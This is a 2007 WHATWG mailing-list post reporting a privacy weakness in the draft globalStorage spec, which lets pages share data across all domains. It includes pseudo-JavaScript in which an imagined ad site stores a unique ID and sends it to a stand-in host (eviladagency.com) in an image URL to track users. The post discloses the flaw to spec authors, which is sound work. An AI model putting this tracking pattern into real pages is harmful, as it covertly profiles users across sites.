[whatwg] Potenial Security Problem in Global Storage Specification
Jerason Banes
jbanes at gmail.com
Wed May 30 22:13:56 PDT 2007
Hello All!
This is my first post here, so apologies in advance if I'm not quite up on
the list etiquette.
I was just comparing the Storage API with that of the Google
Gears<http://gears.google.com>,
and something jumped out at me. According to the spec, browsers should allow
a webapp to store data in the globalStorage object with no domain attached.
(i.e. globalStorage['']) This is intended to allow data to be shared across
all webpages.
My concern is that this poses a problem for the user's privacy. Let's say
that I'm an Evil Advertisement site. It is in my interest to penetrate the
user's veil of privacy and determine which pages they visit. I've
traditionally used cookies for this, but the browser makers foiled my
attempts by allowing cookies to only be accepted from the originating site.
But thanks to the new globalStorage API, I can store a Unique ID in the
user's browser, then use Javascript to retrieve it every time they download
one of my ads.
Here's some rough psuedo-js to demonstrate how it might work:
<script>
if(!gloabalStorage[''].evilbit) gloabalStorage[''].evilbit = createUUID();
var createUUID()
{
//return a unique identifier using a random algorithm.
}
var displayEvilAd(type)
{
document.write('<img src="http://www.eviladagency.com' +
'/getAdvertisement.asp' +
'?type=' + type +
'&tracking=' + gloabalStorage[''].evilbit+'">');
}
</script>
...
<script>displayEvilAd("banner");</script>
Is there something I'm missing that would prevent this?
Thanks,
Jerason Banes
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.whatwg.org/pipermail/whatwg-whatwg.org/attachments/20070531/17461fdd/attachment-0001.htm>
More information about the whatwg
mailing list